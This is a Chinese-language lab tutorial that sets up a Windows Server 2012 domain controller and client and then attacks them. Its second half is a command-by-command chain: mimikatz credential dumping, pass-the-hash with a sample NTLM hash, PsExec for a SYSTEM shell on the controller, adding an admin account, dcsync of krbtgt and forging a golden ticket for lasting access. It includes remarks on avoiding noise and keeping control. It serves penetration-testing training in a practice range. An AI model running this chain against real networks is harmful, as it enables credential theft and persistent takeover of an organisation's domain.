内网域控靶机从安装到实践，一条龙服务

那么我们现在也来试着搭建一下域控

一、安装域（1.网络；防火墙。2.DNS、AD。3.）

安装域控制器之前需要几步简单的操作及注意事项

1：安装完后最好不要更改域控制器计算机名，可能会出现问题（基本出问题的几率90%以上）。
2：提前设置好本地administrator用户的密码并牢记（不然的话在先决条件基本通过不了）。
3：第一台域控制器也是DNS服务器（好像2012是这样的，其他版本不知道），所以IP和DNS设置必须是一样的，网关DNS也需要设置，（不设置的话客户机加域会出现问题）具体情况以网络构造而定。
可以参照下面这4篇文章

server 2008 详细搭建。
https://blog.csdn.net/qq_26741933/article/details/90376714
server 2008 详细搭建2

https://blog.csdn.net/qq_43170906/article/details/92832634?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param

域控机+客户机搭建
https://blog.csdn.net/jiaqu2177/article/details/81943615
域控机+客户机搭建2
https://jingyan.baidu.com/article/14bd256e469874bb6d2612a7.html

+++++++++++++++++++++++++++++++++++++++++++++++++
https://www.sohu.com/a/166462698_99973431（域用户登录客户机）
首先先创建一台window的服务器（这里我用的是server 2012）

更改计算机名完成后重启

记得给配置固定IP地址，我这里是虚拟机，所以IP地址仅供参考。（DC）
域服务器的话，DNS可以设置多个的，首DNS IP必需是域控服务器的IP，其它次DNS的IP就是公网DNS IP。
（我这里的192.168.0.2是网关，通过网关转发出去）

dns服务器就是域控的ip地址

设置管理员账号密码之后域控登陆就是此密码，牢记

1、打开服务器控制面板

（1）打开服务器管理器，添加角色和功能。

（2）选择AD域服务，下一步 。


为了防止意外，我们让他自启动

二、配置域

（1）点击服务器管理器左侧“AD DS” 、点击黄色提示部分中的更多。

（2）点击“将此服务器升级为域控制器” 。

（3）进入AD域服务器配置向导，选择 “添加新林” ，输入域，点击下一步。

（4）设置域控还原密码，下一步 。
下图为解释，为什么要弄还原密码

这里我设置的还原密码为111111yY

（5）提示DNS无法创建，不用管，继续下一步 。

（6）安装路径，默认，下一步 。

（7）查看选项，默认，下一步 。

（8）点击安装 。此过程可能会报错，提示登陆用户没有设置密码，去设置给当前登陆用户（Administrator）设置一个密码，然后回来点击 “重新运行先决条件检查” 即可！

（9）安装完成，会提示注销重启 （此过程比较漫长，耐心等待）。

四、将客户机加入到域控服务器

这里的客户机我用的win7,只有域控服务器有点小要求，客户机只要是window都可以。
（1）打开转换服务器，修改转换服务器的NDS，指向域控服务器（刚才的服务器ip地址）。
这里是我虚拟机的ip，具体情况根据自己的环境来设置

（2）在计算机属性中，修改计算机名称（随意），并添加到域控服务器（域为“添加新林”时设置的域名），确定后提示注销重启服务器。


或者加一下后缀也可以

输入域控制器管理员用户及密码，单击确定。
就是域控制服务器的账户和解锁密码，不要想多了，不是啥值钱设置的还原密码，账户也不是什么奇奇怪怪的账号

（3）打开域控服务器，点击管理 > 添加服务器，输入转换服务器修改后的计算机名称，立即查找。将搜索到的服务器双击添加到右边，点击确定。

还有一定要记得把客户机的防火墙关了，不然后面一步访问不了

（4）在域控服务器中，所有服务器显示两台服务器，并都是联机状态则表示成功 。

至此，域控服务器安装完成。

由于法国神器只能抓取明文

那么如果我们不想让法国神器抓取到我们的明文密码的话，我么就要打KB2871997的补丁，再修改注册列表。

KB2871997补丁链接

https://www.microsoft.com/zh-CN/download/confirmation.aspx?id=42745
在客户机上安装这个补丁。

然后修改一下注册列表

创建好后，值设为 0

可以通过其他在域中的客户机登录域控机

那么为什么任意客户机登录域控机账号，可以识别是域控账号呢？
这里就要牵扯到kerberos协议

之前域控机来登录过其他客户机，那么域控机会不会留下密码呢？

看到了Domain这一栏的yq233，是域名，说明了之前域控机来登录过。

我们来看下他的域账户计算机名是啥，但是报错了，这里可以明确的告诉你，是因为权限不够，administrator不是最高权限，system才是最高权限。

既然需要system权限才能执行一些命令，那么我们就提升到system权限。可以用一个工具PsEexec.exe

前提条件：

然后我们在普通cmd里执行这个提权工具，生成提权cmd，然后提权cmd可以看到是system权限

现在我们在提权工具生成的cmd来执行之前那个查询域账户计算机名命令就可以正常执行了。

好了，我们现在知道了域控名字和密文密码

注：数据库不储存明文密码，一般都是储存密文密码

我们用法国神器抓取到密文后，通过哈希传递来登录域控机
抓取哈希密码

privilege::debug

sekurlsa::logonpasswords

红色部分是要替换的部分
哈希传递命令：

sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:11186c1ce83e1fcfc9520d0252312118

这里要说下关于法国神器的几个坑

1、要复制里面的字符，必须先输入log命令，在法国神器同目录下生成一个mimikatz.log文件，然后我们这个在这个文件里复制法国神器里的字符。

2.粘贴的时候要点击窗口=》编辑=》粘贴

然后在法国神器里输入改好的哈希传递命令

输入哈希传递命令后，她会生成一个哈希cmd框，就可以连接上域控机。虽然这里的whami是a1（客户机），
但是他已经哈希传递了给域控机效验了。
这里我们通过之前提权cmd知道的域名，现在来通过哈希cmd查看到的域控机的C盘里的相关信息。

而直接普通cmd是不能查看的。必须通过哈希传递的cmd，才能查看到域控机的信息。这里查看的是c盘的信息

我们通过上面的哈希传递知道了域控机的C盘信息，那我们要知道其他信息呢？
那么可以直接

PsExec.exe \\计算机名.域名 cmd

如下图第一句命令（我们在哈希cmd里用提权工具）

我们就成功得到域控机的cmd了

(这里我还是把图里的命令打出来：

PsExec.exe \\WIN-D6PMU0BIMC1.zkaq.cn cmd

这样我就可以为所欲为了，添加个账号也挺好的，不过不建议这么干，动静太大了。这里我们要知道域控可以登录一切域内机器，所以域控的账号密码会换来换去，我们可能下次就不能这样的登录了，那么为了维持长久的控制，我们要去制作伪造一个黄金票据。他域控密码改了我也能继续用。

我们通过哈希传递得到域控机cmd，然后创建一个账户并提权（这里不要慌，我们弄了黄金票据后就马上删掉这个账户），然后3389登录，并在域控机里用法国神器执行：

lsadump::dcsync /user:krbtgt

注意！这里是在连接了域控机的3389

然后在把SID和hash这2个的值给复制出来，我们就可以伪造黄金票据了。

制作黄金票据（是在客户机上制造黄金票据，域控机只是拿到SID和NTLM）

红色部分是要替换的部分(3处

kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi。

然后把这个黄金票据在自己的主机或者域控里的客户机上的法国神器里执行，就会在与法国神器同目录下生成一个文件。这个文件就是生成的黄金票据。

然后加载黄金票据

kerberos::ptt administrator.kiribi

然后在本地或者域控的客户机上查看票据

有了黄金票据后，我们直接在本机上的普通cmd执行，就可以拿到权限和想要的信息了

开始靶场测试

我们来抓取一下哈希密码（Domain的值、NTLM的值）
sekurlsa::logonpasswords

sekurlsa::logonpasswords

输入哈希传递命令后，她会弹出一个新的cmd框，在这个弹出的cmd框就可以连接上域控机。

sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:11186c1ce83e1fcfc9520d0252312118

接下来是查询信息，查询命令是dir C:/ 但是我们这里是在域里面
所以命令应该是

dir 域名\C$

我们先查看域名，发现报错，报错的原因是因为administrator权限还是不够，要system权限才够。

那么我们在客户机上使用window官方提权软件，之后会弹出一个新的cmd框。

在这个弹出来的cmd框内，我们查看域名。

然后我们再在哈希传递弹出的cmd框上查看域控机的C盘里信息

dir 域名\C$

然后我们再在哈希传递的的cmd框里用window自带的提权软件，再提权下cmd，就连接到域控机的cmd了
我们再在域控机里创建一个用户。

并把这个用户提权。

然后我们在用3389连接这个用户。


然后就拿到flag了

如果不想保留这个新创建的用户，搞这么大的动静，后面还可以做黄金票据后，再把这个新建用户删了。

最后还是来总结一下

在哈希传递的cmd里再用官方提权工具连接域控机的cmd
哈希传递和黄金票据制作都是在客户机上做
只有黄金票据所需要的值才是在域控机上做
———————————————————————————
1》抓取哈希密码
2》得到哈希传递cmd
3》在哈希传递cmd查看域控机信息之前，先要查看域名
4》然后在哈希传递cmd里使用官方提权工具新建管理员用户
5》远程连接域控机，就用这个新建管理用户去连接。
6》如果有需要，可以制作黄金票据